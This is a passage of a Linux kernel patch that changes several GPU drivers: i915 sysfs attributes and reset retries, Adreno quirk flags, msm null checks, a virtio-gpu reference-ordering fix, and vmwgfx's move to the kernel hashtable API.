++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	u32 val;
+ 	int err;
+ 
+@@ -691,11 +647,11 @@ static ssize_t media_RP0_freq_mhz_show(struct device *dev,
+ 	return sysfs_emit(buff, "%u\n", val);
+ }
+ 
+-static ssize_t media_RPn_freq_mhz_show(struct device *dev,
+-				       struct device_attribute *attr,
++static ssize_t media_RPn_freq_mhz_show(struct kobject *kobj,
++				       struct kobj_attribute *attr,
+ 				       char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	u32 val;
+ 	int err;
+ 
+@@ -712,17 +668,17 @@ static ssize_t media_RPn_freq_mhz_show(struct device *dev,
+ 	return sysfs_emit(buff, "%u\n", val);
+ }
+ 
+-static DEVICE_ATTR_RW(media_freq_factor);
+-static struct device_attribute dev_attr_media_freq_factor_scale =
++INTEL_GT_ATTR_RW(media_freq_factor);
++static struct kobj_attribute attr_media_freq_factor_scale =
+ 	__ATTR(media_freq_factor.scale, 0444, freq_factor_scale_show, NULL);
+-static DEVICE_ATTR_RO(media_RP0_freq_mhz);
+-static DEVICE_ATTR_RO(media_RPn_freq_mhz);
++INTEL_GT_ATTR_RO(media_RP0_freq_mhz);
++INTEL_GT_ATTR_RO(media_RPn_freq_mhz);
+ 
+ static const struct attribute *media_perf_power_attrs[] = {
+-	&dev_attr_media_freq_factor.attr,
+-	&dev_attr_media_freq_factor_scale.attr,
+-	&dev_attr_media_RP0_freq_mhz.attr,
+-	&dev_attr_media_RPn_freq_mhz.attr,
++	&attr_media_freq_factor.attr,
++	&attr_media_freq_factor_scale.attr,
++	&attr_media_RP0_freq_mhz.attr,
++	&attr_media_RPn_freq_mhz.attr,
+ 	NULL
+ };
+ 
+@@ -754,20 +710,29 @@ static const struct attribute * const rps_defaults_attrs[] = {
+ 	NULL
+ };
+ 
+-static int intel_sysfs_rps_init(struct intel_gt *gt, struct kobject *kobj,
+-				const struct attribute * const *attrs)
++static int intel_sysfs_rps_init(struct intel_gt *gt, struct kobject *kobj)
+ {
++	const struct attribute * const *attrs;
++	struct attribute *vlv_attr;
+ 	int ret;
+ 
+ 	if (GRAPHICS_VER(gt->i915) < 6)
+ 		return 0;
+ 
++	if (is_object_gt(kobj)) {
++		attrs = gen6_rps_attrs;
++		vlv_attr = &attr_rps_vlv_rpe_freq_mhz.attr;
++	} else {
++		attrs = gen6_gt_attrs;
++		vlv_attr = &dev_attr_gt_vlv_rpe_freq_mhz.attr;
++	}
++
+ 	ret = sysfs_create_files(kobj, attrs);
+ 	if (ret)
+ 		return ret;
+ 
+ 	if (IS_VALLEYVIEW(gt->i915) || IS_CHERRYVIEW(gt->i915))
+-		ret = sysfs_create_file(kobj, &dev_attr_vlv_rpe_freq_mhz.attr);
++		ret = sysfs_create_file(kobj, vlv_attr);
+ 
+ 	return ret;
+ }
+@@ -778,9 +743,7 @@ void intel_gt_sysfs_pm_init(struct intel_gt *gt, struct kobject *kobj)
+ 
+ 	intel_sysfs_rc6_init(gt, kobj);
+ 
+-	ret = is_object_gt(kobj) ?
+-	      intel_sysfs_rps_init(gt, kobj, gen6_rps_attrs) :
+-	      intel_sysfs_rps_init(gt, kobj, gen6_gt_attrs);
++	ret = intel_sysfs_rps_init(gt, kobj);
+ 	if (ret)
+ 		drm_warn(&gt->i915->drm,
+ 			 "failed to create gt%u RPS sysfs files (%pe)",
+@@ -790,7 +753,7 @@ void intel_gt_sysfs_pm_init(struct intel_gt *gt, struct kobject *kobj)
+ 	if (!is_object_gt(kobj))
+ 		return;
+ 
+-	ret = sysfs_create_file(kobj, &dev_attr_punit_req_freq_mhz.attr);
++	ret = sysfs_create_file(kobj, &attr_punit_req_freq_mhz.attr);
+ 	if (ret)
+ 		drm_warn(&gt->i915->drm,
+ 			 "failed to create gt%u punit_req_freq_mhz sysfs (%pe)",
+diff --git a/drivers/gpu/drm/i915/gt/intel_reset.c b/drivers/gpu/drm/i915/gt/intel_reset.c
+index b366743569862..10b930eaa8cb8 100644
+--- a/drivers/gpu/drm/i915/gt/intel_reset.c
++++ b/drivers/gpu/drm/i915/gt/intel_reset.c
+@@ -278,6 +278,7 @@ out:
+ static int gen6_hw_domain_reset(struct intel_gt *gt, u32 hw_domain_mask)
+ {
+ 	struct intel_uncore *uncore = gt->uncore;
++	int loops = 2;
+ 	int err;
+ 
+ 	/*
+@@ -285,18 +286,39 @@ static int gen6_hw_domain_reset(struct intel_gt *gt, u32 hw_domain_mask)
+ 	 * for fifo space for the write or forcewake the chip for
+ 	 * the read
+ 	 */
+-	intel_uncore_write_fw(uncore, GEN6_GDRST, hw_domain_mask);
++	do {
++		intel_uncore_write_fw(uncore, GEN6_GDRST, hw_domain_mask);
+ 
+-	/* Wait for the device to ack the reset requests */
+-	err = __intel_wait_for_register_fw(uncore,
+-					   GEN6_GDRST, hw_domain_mask, 0,
+-					   500, 0,
+-					   NULL);
++		/*
++		 * Wait for the device to ack the reset requests.
++		 *
++		 * On some platforms, e.g. Jasperlake, we see that the
++		 * engine register state is not cleared until shortly after
++		 * GDRST reports completion, causing a failure as we try
++		 * to immediately resume while the internal state is still
++		 * in flux. If we immediately repeat the reset, the second
++		 * reset appears to serialise with the first, and since
++		 * it is a no-op, the registers should retain their reset
++		 * value. However, there is still a concern that upon
++		 * leaving the second reset, the internal engine state
++		 * is still in flux and not ready for resuming.
++		 */
++		err = __intel_wait_for_register_fw(uncore, GEN6_GDRST,
++						   hw_domain_mask, 0,
++						   2000, 0,
++						   NULL);
++	} while (err == 0 && --loops);
+ 	if (err)
+ 		GT_TRACE(gt,
+ 			 "Wait for 0x%08x engines reset failed\n",
+ 			 hw_domain_mask);
+ 
++	/*
++	 * As we have observed that the engine state is still volatile
++	 * after GDRST is acked, impose a small delay to let everything settle.
++	 */
++	udelay(50);
++
+ 	return err;
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/i915_vma.c b/drivers/gpu/drm/i915/i915_vma.c
+index 4d06875de14a1..c8ad8f37e5cfe 100644
+--- a/drivers/gpu/drm/i915/i915_vma.c
++++ b/drivers/gpu/drm/i915/i915_vma.c
+@@ -2114,7 +2114,7 @@ int i915_vma_unbind_async(struct i915_vma *vma, bool trylock_vm)
+ 	if (!obj->mm.rsgt)
+ 		return -EBUSY;
+ 
+-	err = dma_resv_reserve_fences(obj->base.resv, 1);
++	err = dma_resv_reserve_fences(obj->base.resv, 2);
+ 	if (err)
+ 		return -EBUSY;
+ 
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.h b/drivers/gpu/drm/msm/adreno/adreno_gpu.h
+index e7adc5c632d07..3d78efb066b1e 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.h
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.h
+@@ -29,11 +29,9 @@ enum {
+ 	ADRENO_FW_MAX,
+ };
+ 
+-enum adreno_quirks {
+-	ADRENO_QUIRK_TWO_PASS_USE_WFI = 1,
+-	ADRENO_QUIRK_FAULT_DETECT_MASK = 2,
+-	ADRENO_QUIRK_LMLOADKILL_DISABLE = 3,
+-};
++#define ADRENO_QUIRK_TWO_PASS_USE_WFI		BIT(0)
++#define ADRENO_QUIRK_FAULT_DETECT_MASK		BIT(1)
++#define ADRENO_QUIRK_LMLOADKILL_DISABLE		BIT(2)
+ 
+ struct adreno_rev {
+ 	uint8_t  core;
+@@ -65,7 +63,7 @@ struct adreno_info {
+ 	const char *name;
+ 	const char *fw[ADRENO_FW_MAX];
+ 	uint32_t gmem;
+-	enum adreno_quirks quirks;
++	u64 quirks;
+ 	struct msm_gpu *(*init)(struct drm_device *dev);
+ 	const char *zapfw;
+ 	u32 inactive_period;
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+index 7cbcef6efe171..62f6ff6abf410 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+@@ -132,7 +132,6 @@ static void dpu_encoder_phys_wb_set_qos(struct dpu_encoder_phys *phys_enc)
+  * dpu_encoder_phys_wb_setup_fb - setup output framebuffer
+  * @phys_enc:	Pointer to physical encoder
+  * @fb:		Pointer to output framebuffer
+- * @wb_roi:	Pointer to output region of interest
+  */
+ static void dpu_encoder_phys_wb_setup_fb(struct dpu_encoder_phys *phys_enc,
+ 		struct drm_framebuffer *fb)
+@@ -692,7 +691,7 @@ static void dpu_encoder_phys_wb_init_ops(struct dpu_encoder_phys_ops *ops)
+ 
+ /**
+  * dpu_encoder_phys_wb_init - initialize writeback encoder
+- * @init:	Pointer to init info structure with initialization params
++ * @p:	Pointer to init info structure with initialization params
+  */
+ struct dpu_encoder_phys *dpu_encoder_phys_wb_init(
+ 		struct dpu_enc_phys_init_params *p)
+diff --git a/drivers/gpu/drm/msm/dp/dp_aux.c b/drivers/gpu/drm/msm/dp/dp_aux.c
+index d030a93a08c36..cc3efed593aa1 100644
+--- a/drivers/gpu/drm/msm/dp/dp_aux.c
++++ b/drivers/gpu/drm/msm/dp/dp_aux.c
+@@ -423,6 +423,10 @@ void dp_aux_isr(struct drm_dp_aux *dp_aux)
+ 
+ 	isr = dp_catalog_aux_get_irq(aux->catalog);
+ 
++	/* no interrupts pending, return immediately */
++	if (!isr)
++		return;
++
+ 	if (!aux->cmd_busy)
+ 		return;
+ 
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index 105b5b48e828c..681c1b889b31a 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -1271,7 +1271,7 @@ void msm_drv_shutdown(struct platform_device *pdev)
+ 	 * msm_drm_init, drm_dev->registered is used as an indicator that the
+ 	 * shutdown will be successful.
+ 	 */
+-	if (drm && drm->registered)
++	if (drm && drm->registered && priv->kms)
+ 		drm_atomic_helper_shutdown(drm);
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/msm_mdss.c b/drivers/gpu/drm/msm/msm_mdss.c
+index e13c5c12b775f..3b8d6991b04e0 100644
+--- a/drivers/gpu/drm/msm/msm_mdss.c
++++ b/drivers/gpu/drm/msm/msm_mdss.c
+@@ -46,15 +46,17 @@ struct msm_mdss {
+ static int msm_mdss_parse_data_bus_icc_path(struct device *dev,
+ 					    struct msm_mdss *msm_mdss)
+ {
+-	struct icc_path *path0 = of_icc_get(dev, "mdp0-mem");
+-	struct icc_path *path1 = of_icc_get(dev, "mdp1-mem");
++	struct icc_path *path0;
++	struct icc_path *path1;
+ 
++	path0 = of_icc_get(dev, "mdp0-mem");
+ 	if (IS_ERR_OR_NULL(path0))
+ 		return PTR_ERR_OR_ZERO(path0);
+ 
+ 	msm_mdss->path[0] = path0;
+ 	msm_mdss->num_paths = 1;
+ 
++	path1 = of_icc_get(dev, "mdp1-mem");
+ 	if (!IS_ERR_OR_NULL(path1)) {
+ 		msm_mdss->path[1] = path1;
+ 		msm_mdss->num_paths++;
+diff --git a/drivers/gpu/drm/virtio/virtgpu_ioctl.c b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+index 5d05093014ac3..9f4a90493aeac 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_ioctl.c
++++ b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+@@ -358,10 +358,18 @@ static int virtio_gpu_resource_create_ioctl(struct drm_device *dev, void *data,
+ 		drm_gem_object_release(obj);
+ 		return ret;
+ 	}
+-	drm_gem_object_put(obj);
+ 
+ 	rc->res_handle = qobj->hw_res_handle; /* similiar to a VM address */
+ 	rc->bo_handle = handle;
++
++	/*
++	 * The handle owns the reference now.  But we must drop our
++	 * remaining reference *after* we no longer need to dereference
++	 * the obj.  Otherwise userspace could guess the handle and
++	 * race closing it from another thread.
++	 */
++	drm_gem_object_put(obj);
++
+ 	return 0;
+ }
+ 
+@@ -723,11 +731,18 @@ static int virtio_gpu_resource_create_blob_ioctl(struct drm_device *dev,
+ 		drm_gem_object_release(obj);
+ 		return ret;
+ 	}
+-	drm_gem_object_put(obj);
+ 
+ 	rc_blob->res_handle = bo->hw_res_handle;
+ 	rc_blob->bo_handle = handle;
+ 
++	/*
++	 * The handle owns the reference now.  But we must drop our
++	 * remaining reference *after* we no longer need to dereference
++	 * the obj.  Otherwise userspace could guess the handle and
++	 * race closing it from another thread.
++	 */
++	drm_gem_object_put(obj);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/vmwgfx/Makefile b/drivers/gpu/drm/vmwgfx/Makefile
+index eee73b9aa404b..68e350f410ad3 100644
+--- a/drivers/gpu/drm/vmwgfx/Makefile
++++ b/drivers/gpu/drm/vmwgfx/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-vmwgfx-y := vmwgfx_execbuf.o vmwgfx_gmr.o vmwgfx_hashtab.o vmwgfx_kms.o vmwgfx_drv.o \
++vmwgfx-y := vmwgfx_execbuf.o vmwgfx_gmr.o vmwgfx_kms.o vmwgfx_drv.o \
+ 	    vmwgfx_ioctl.o vmwgfx_resource.o vmwgfx_ttm_buffer.o \
+ 	    vmwgfx_cmd.o vmwgfx_irq.o vmwgfx_ldu.o vmwgfx_ttm_glue.o \
+ 	    vmwgfx_overlay.o vmwgfx_gmrid_manager.o vmwgfx_fence.o \
+diff --git a/drivers/gpu/drm/vmwgfx/ttm_object.c b/drivers/gpu/drm/vmwgfx/ttm_object.c
+index 26a55fef1ab50..ddf8373c1d779 100644
+--- a/drivers/gpu/drm/vmwgfx/ttm_object.c
++++ b/drivers/gpu/drm/vmwgfx/ttm_object.c
+@@ -1,7 +1,7 @@
+ /* SPDX-License-Identifier: GPL-2.0 OR MIT */
+ /**************************************************************************
+  *
+- * Copyright (c) 2009-2013 VMware, Inc., Palo Alto, CA., USA
++ * Copyright (c) 2009-2022 VMware, Inc., Palo Alto, CA., USA
+  * All Rights Reserved.
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+@@ -44,16 +44,20 @@
+ 
+ #define pr_fmt(fmt) "[TTM] " fmt
+ 
++#include "ttm_object.h"
++#include "vmwgfx_drv.h"
++
+ #include <linux/list.h>
+ #include <linux/spinlock.h>
+ #include <linux/slab.h>
+ #include <linux/atomic.h>
+ #include <linux/module.h>
+-#include "ttm_object.h"
+-#include "vmwgfx_drv.h"
++#include <linux/hashtable.h>
+ 
+ MODULE_IMPORT_NS(DMA_BUF);
+ 
++#define VMW_TTM_OBJECT_REF_HT_ORDER 10
++
+ /**
+  * struct ttm_object_file
+  *
+@@ -74,16 +78,14 @@ struct ttm_object_file {
+ 	struct ttm_object_device *tdev;
+ 	spinlock_t lock;
+ 	struct list_head ref_list;
+-	struct vmwgfx_open_hash ref_hash;
++	DECLARE_HASHTABLE(ref_hash, VMW_TTM_OBJECT_REF_HT_ORDER);
+ 	struct kref refcount;
+ };
+ 
+ /*
+  * struct ttm_object_device
+  *
+- * @object_lock: lock that protects the object_hash hash table.
+- *
+- * @object_hash: hash table for fast lookup of object global names.
++ * @object_lock: lock that protects idr.
+  *
+  * @object_count: Per device object count.
+  *
+@@ -92,7 +94,6 @@ struct ttm_object_file {
+ 
+ struct ttm_object_device {
+ 	spinlock_t object_lock;
+-	struct vmwgfx_open_hash object_hash;
+ 	atomic_t object_count;
+ 	struct dma_buf_ops ops;
+ 	void (*dmabuf_release)(struct dma_buf *dma_buf);
+@@ -138,6 +139,36 @@ ttm_object_file_ref(struct ttm_object_file *tfile)
+ 	return tfile;
+ }
+ 
++static int ttm_tfile_find_ref_rcu(struct ttm_object_file *tfile,
++				  uint64_t key,
++				  struct vmwgfx_hash_item **p_hash)
++{
++	struct vmwgfx_hash_item *hash;
++
++	hash_for_each_possible_rcu(tfile->ref_hash, hash, head, key) {
++		if (hash->key == key) {
++			*p_hash = hash;
++			return 0;
++		}
++	}
++	return -EINVAL;
++}
++
++static int ttm_tfile_find_ref(struct ttm_object_file *tfile,
++			      uint64_t key,
++			      struct vmwgfx_hash_item **p_hash)
++{
++	struct vmwgfx_hash_item *hash;
++
++	hash_for_each_possible(tfile->ref_hash, hash, head, key) {
++		if (hash->key == key) {
++			*p_hash = hash;
++			return 0;
++		}
++	}
++	return -EINVAL;
++}
++
+ static void ttm_object_file_destroy(struct kref *kref)
+ {
+ 	struct ttm_object_file *tfile =
+@@ -223,64 +254,29 @@ void ttm_base_object_unref(struct ttm_base_object **p_base)
+ 	kref_put(&base->refcount, ttm_release_base);
+ }
+ 
+-/**
+- * ttm_base_object_noref_lookup - look up a base object without reference
+- * @tfile: The struct ttm_object_file the object is registered with.
+- * @key: The object handle.
+- *
+- * This function looks up a ttm base object and returns a pointer to it
+- * without refcounting the pointer. The returned pointer is only valid
+- * until ttm_base_object_noref_release() is called, and the object
+- * pointed to by the returned pointer may be doomed. Any persistent usage
+- * of the object requires a refcount to be taken using kref_get_unless_zero().
+- * Iff this function returns successfully it needs to be paired with
+- * ttm_base_object_noref_release() and no sleeping- or scheduling functions
+- * may be called inbetween these function callse.
+- *
+- * Return: A pointer to the object if successful or NULL otherwise.
+- */
+-struct ttm_base_object *
+-ttm_base_object_noref_lookup(struct ttm_object_file *tfile, uint32_t key)
+-{
+-	struct vmwgfx_hash_item *hash;
+-	struct vmwgfx_open_hash *ht = &tfile->ref_hash;
+-	int ret;
+-
+-	rcu_read_lock();
+-	ret = vmwgfx_ht_find_item_rcu(ht, key, &hash);
+-	if (ret) {
+-		rcu_read_unlock();
+-		return NULL;
+-	}
+-
+-	__release(RCU);
+-	return drm_hash_entry(hash, struct ttm_ref_object, hash)->obj;
+-}
+-EXPORT_SYMBOL(ttm_base_object_noref_lookup);
+-
+ struct ttm_base_object *ttm_base_object_lookup(struct ttm_object_file *tfile,
+-					       uint32_t key)
++					       uint64_t key)
+ {
+ 	struct ttm_base_object *base = NULL;
+ 	struct vmwgfx_hash_item *hash;
+-	struct vmwgfx_open_hash *ht = &tfile->ref_hash;
+ 	int ret;
+ 
+-	rcu_read_lock();
+-	ret = vmwgfx_ht_find_item_rcu(ht, key, &hash);
++	spin_lock(&tfile->lock);
++	ret = ttm_tfile_find_ref(tfile, key, &hash);
+ 
+ 	if (likely(ret == 0)) {
+-		base = drm_hash_entry(hash, struct ttm_ref_object, hash)->obj;
++		base = hlist_entry(hash, struct ttm_ref_object, hash)->obj;
+ 		if (!kref_get_unless_zero(&base->refcount))
+ 			base = NULL;
+ 	}
+-	rcu_read_unlock();
++	spin_unlock(&tfile->lock);
++
+ 
+ 	return base;
+ }
+ 
+ struct ttm_base_object *
+-ttm_base_object_lookup_for_ref(struct ttm_object_device *tdev, uint32_t key)
++ttm_base_object_lookup_for_ref(struct ttm_object_device *tdev, uint64_t key)
+ {
+ 	struct ttm_base_object *base;
+ 
+@@ -299,7 +295,6 @@ int ttm_ref_object_add(struct ttm_object_file *tfile,
+ 		       bool *existed,
+ 		       bool require_existed)
+ {
+-	struct vmwgfx_open_hash *ht = &tfile->ref_hash;
+ 	struct ttm_ref_object *ref;
+ 	struct vmwgfx_hash_item *hash;
+ 	int ret = -EINVAL;
+@@ -312,10 +307,10 @@ int ttm_ref_object_add(struct ttm_object_file *tfile,
+ 
+ 	while (ret == -EINVAL) {
+ 		rcu_read_lock();
+-		ret = vmwgfx_ht_find_item_rcu(ht, base->handle, &hash);
++		ret = ttm_tfile_find_ref_rcu(tfile, base->handle, &hash);
+ 
+ 		if (ret == 0) {
+-			ref = drm_hash_entry(hash, struct ttm_ref_object, hash);
++			ref = hlist_entry(hash, struct ttm_ref_object, hash);
+ 			if (kref_get_unless_zero(&ref->kref)) {
+ 				rcu_read_unlock();
+ 				break;
+@@ -337,21 +332,14 @@ int ttm_ref_object_add(struct ttm_object_file *tfile,
+ 		kref_init(&ref->kref);
+ 
+ 		spin_lock(&tfile->lock);
+-		ret = vmwgfx_ht_insert_item_rcu(ht, &ref->hash);
+-
+-		if (likely(ret == 0)) {
+-			list_add_tail(&ref->head, &tfile->ref_list);
+-			kref_get(&base->refcount);
+-			spin_unlock(&tfile->lock);
+-			if (existed != NULL)
+-				*existed = false;
+-			break;
+-		}
++		hash_add_rcu(tfile->ref_hash, &ref->hash.head, ref->hash.key);
++		ret = 0;
+ 
++		list_add_tail(&ref->head, &tfile->ref_list);
++		kref_get(&base->refcount);
+ 		spin_unlock(&tfile->lock);
+-		BUG_ON(ret != -EINVAL);
+-
+-		kfree(ref);
++		if (existed != NULL)
++			*existed = false;
+ 	}
+ 
+ 	return ret;
+@@ -363,10 +351,8 @@ ttm_ref_object_release(struct kref *kref)
+ 	struct ttm_ref_object *ref =
+ 	    container_of(kref, struct ttm_ref_object, kref);
+ 	struct ttm_object_file *tfile = ref->tfile;
+-	struct vmwgfx_open_hash *ht;
+ 
+-	ht = &tfile->ref_hash;
+-	(void)vmwgfx_ht_remove_item_rcu(ht, &ref->hash);
++	hash_del_rcu(&ref->hash.head);
+ 	list_del(&ref->head);
+ 	spin_unlock(&tfile->lock);
+ 
+@@ -378,18 +364,17 @@ ttm_ref_object_release(struct kref *kref)
+ int ttm_ref_object_base_unref(struct ttm_object_file *tfile,
+ 			      unsigned long key)
+ {
+-	struct vmwgfx_open_hash *ht = &tfile->ref_hash;
+ 	struct ttm_ref_object *ref;
+ 	struct vmwgfx_hash_item *hash;
+ 	int ret;
+ 
+ 	spin_lock(&tfile->lock);
+-	ret = vmwgfx_ht_find_item(ht, key, &hash);
++	ret = ttm_tfile_find_ref(tfile, key, &hash);
+ 	if (unlikely(ret != 0)) {
+ 		spin_unlock(&tfile->lock);
+ 		return -EINVAL;
+ 	}
+-	ref = drm_hash_entry(hash, struct ttm_ref_object, hash);
++	ref = hlist_entry(hash, struct ttm_ref_object, hash);
+ 	kref_put(&ref->kref, ttm_ref_object_release);
+ 	spin_unlock(&tfile->lock);
+ 	return 0;
+@@ -416,16 +401,13 @@ void ttm_object_file_release(struct ttm_object_file **p_tfile)
+ 	}
+ 
+ 	spin_unlock(&tfile->lock);
+-	vmwgfx_ht_remove(&tfile->ref_hash);
+ 
+ 	ttm_object_file_unref(&tfile);
+ }
+ 
+-struct ttm_object_file *ttm_object_file_init(struct ttm_object_device *tdev,
+-					     unsigned int hash_order)
++struct ttm_object_file *ttm_object_file_init(struct ttm_object_device *tdev)
+ {
+ 	struct ttm_object_file *tfile = kmalloc(sizeof(*tfile), GFP_KERNEL);
+-	int ret;
+ 
+ 	if (unlikely(tfile == NULL))
+ 		return NULL;
+@@ -435,34 +417,21 @@ struct ttm_object_file *ttm_object_file_init(struct ttm_object_device *tdev,
+ 	kref_init(&tfile->refcount);
+ 	INIT_LIST_HEAD(&tfile->ref_list);
+ 
+-	ret = vmwgfx_ht_create(&tfile->ref_hash, hash_order);
+-	if (ret)
+-		goto out_err;
++	hash_init(tfile->ref_hash);
+ 
+ 	return tfile;
+-out_err:
+-	vmwgfx_ht_remove(&tfile->ref_hash);
+-
+-	kfree(tfile);
+-
+-	return NULL;
+ }
+ 
+ struct ttm_object_device *
+-ttm_object_device_init(unsigned int hash_order,
+-		       const struct dma_buf_ops *ops)
++ttm_object_device_init(const struct dma_buf_ops *ops)
+ {
+ 	struct ttm_object_device *tdev = kmalloc(sizeof(*tdev), GFP_KERNEL);
+-	int ret;
+ 
+ 	if (unlikely(tdev == NULL))
+ 		return NULL;
+ 
+ 	spin_lock_init(&tdev->object_lock);
+ 	atomic_set(&tdev->object_count, 0);
+-	ret = vmwgfx_ht_create(&tdev->object_hash, hash_order);
+-	if (ret != 0)
+-		goto out_no_object_hash;
+ 
+ 	/*
+ 	 * Our base is at VMWGFX_NUM_MOB + 1 because we want to create
+@@ -477,10 +446,6 @@ ttm_object_device_init(unsigned int hash_order,
+ 	tdev->dmabuf_release = tdev->ops.release;
+ 	tdev->ops.release = ttm_prime_dmabuf_release;
+ 	return tdev;
+-
+-out_no_object_hash:
+-	kfree(tdev);
+-	return NULL;
+ }
+ 
+ void ttm_object_device_release(struct ttm_object_device **p_tdev)
+@@ -491,7 +456,6 @@ void ttm_object_device_release(struct ttm_object_device **p_tdev)
+ 
+ 	WARN_ON_ONCE(!idr_is_empty(&tdev->idr));
+ 	idr_destroy(&tdev->idr);
+-	vmwgfx_ht_remove(&tdev->object_hash);
+ 
+ 	kfree(tdev);
+ }
+diff --git a/drivers/gpu/drm/vmwgfx/ttm_object.h b/drivers/gpu/drm/vmwgfx/ttm_object.h
+index 1a2fa0f83f5f9..8098a3846bae3 100644
+--- a/drivers/gpu/drm/vmwgfx/ttm_object.h
++++ b/drivers/gpu/drm/vmwgfx/ttm_object.h
+@@ -1,6 +1,6 @@
+ /**************************************************************************
+  *
+- * Copyright (c) 2006-2009 VMware, Inc., Palo Alto, CA., USA
++ * Copyright (c) 2006-2022 VMware, Inc., Palo Alto, CA., USA
+  * All Rights Reserved.
+  *
+  * Permission is hereby granted, free of charge, to any person obtaining a
+@@ -42,8 +42,6 @@
+ #include <linux/list.h>
+ #include <linux/rcupdate.h>
+ 
+-#include "vmwgfx_hashtab.h"
+-
+ /**
+  * enum ttm_object_type
+  *
+@@ -104,7 +102,7 @@ struct ttm_base_object {
+ 	struct ttm_object_file *tfile;
+ 	struct kref refcount;
+ 	void (*refcount_release) (struct ttm_base_object **base);
+-	u32 handle;
++	u64 handle;
+ 	enum ttm_object_type object_type;
+ 	u32 shareable;
+ };
+@@ -164,7 +162,7 @@ extern int ttm_base_object_init(struct ttm_object_file *tfile,
+  */
+ 
+ extern struct ttm_base_object *ttm_base_object_lookup(struct ttm_object_file
+-						      *tfile, uint32_t key);
++						      *tfile, uint64_t key);
+ 
+ /**
+  * ttm_base_object_lookup_for_ref
+@@ -178,7 +176,7 @@ extern struct ttm_base_object *ttm_base_object_lookup(struct ttm_object_file
+  */
+ 
+ extern struct ttm_base_object *
+-ttm_base_object_lookup_for_ref(struct ttm_object_device *tdev, uint32_t key);
++ttm_base_object_lookup_for_ref(struct ttm_object_device *tdev, uint64_t key);
+ 
+ /**
+  * ttm_base_object_unref
+@@ -237,14 +235,12 @@ extern int ttm_ref_object_base_unref(struct ttm_object_file *tfile,
+  * ttm_object_file_init - initialize a struct ttm_object file
+  *
+  * @tdev: A struct ttm_object device this file is initialized on.
+- * @hash_order: Order of the hash table used to hold the reference objects.
+  *
+  * This is typically called by the file_ops::open function.
+  */
+ 
+ extern struct ttm_object_file *ttm_object_file_init(struct ttm_object_device
+-						    *tdev,
+-						    unsigned int hash_order);
++						    *tdev);
+ 
+ /**
+  * ttm_object_file_release - release data held by a ttm_object_file
+@@ -262,7 +258,6 @@ extern void ttm_object_file_release(struct ttm_object_file **p_tfile);
+ /**
+  * ttm_object device init - initialize a struct ttm_object_device
+  *
+- * @hash_order: Order of hash table used to hash the base objects.
+  * @ops: DMA buf ops for prime objects of this device.
+  *
+  * This function is typically called on device initialization to prepare
+@@ -270,8 +265,7 @@ extern void ttm_object_file_release(struct ttm_object_file **p_tfile);
+  */
+ 
+ extern struct ttm_object_device *
+-ttm_object_device_init(unsigned int hash_order,
+-		       const struct dma_buf_ops *ops);
++ttm_object_device_init(const struct dma_buf_ops *ops);
+ 
+ /**
+  * ttm_object_device_release - release data held by a ttm_object_device
+@@ -313,18 +307,4 @@ extern int ttm_prime_handle_to_fd(struct ttm_object_file *tfile,
+ #define ttm_prime_object_kfree(__obj, __prime)		\
+ 	kfree_rcu(__obj, __prime.base.rhead)
+ 
+-struct ttm_base_object *
+-ttm_base_object_noref_lookup(struct ttm_object_file *tfile, uint32_t key);
+-
+-/**
+- * ttm_base_object_noref_release - release a base object pointer looked up
+- * without reference
+- *
+- * Releases a base object pointer looked up with ttm_base_object_noref_lookup().
+- */
+-static inline void ttm_base_object_noref_release(void)
+-{
+-	__acquire(RCU);
+-	rcu_read_unlock();
+-}
+ #endif
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+index 822251aaab0a1..973a0a52462e9 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_bo.c
+@@ -715,44 +715,6 @@ int vmw_user_bo_lookup(struct drm_file *filp,
+ 	return 0;
+ }
+ 
+-/**
+- * vmw_user_bo_noref_lookup - Look up a vmw user buffer object without reference
+- * @filp: The TTM object file the handle is registered with.
+- * @handle: The user buffer object handle.
+- *
+- * This function looks up a struct vmw_bo and returns a pointer to the
+- * struct vmw_buffer_object it derives from without refcounting the pointer.
+- * The returned pointer is only valid until vmw_user_bo_noref_release() is
+- * called, and the object pointed to by the returned pointer may be doomed.
+- * Any persistent usage of the object requires a refcount to be taken using
+- * ttm_bo_reference_unless_doomed(). Iff this function returns successfully it
+- * needs to be paired with vmw_user_bo_noref_release() and no sleeping-
+- * or scheduling functions may be called in between these function calls.
+- *
+- * Return: A struct vmw_buffer_object pointer if successful or negative
+- * error pointer on failure.
+- */
+-struct vmw_buffer_object *
+-vmw_user_bo_noref_lookup(struct drm_file *filp, u32 handle)
+-{
+-	struct vmw_buffer_object *vmw_bo;
+-	struct ttm_buffer_object *bo;
+-	struct drm_gem_object *gobj = drm_gem_object_lookup(filp, handle);
+-
+-	if (!gobj) {
+-		DRM_ERROR("Invalid buffer object handle 0x%08lx.\n",
+-			  (unsigned long)handle);
+-		return ERR_PTR(-ESRCH);
+-	}
+-	vmw_bo = gem_to_vmw_bo(gobj);
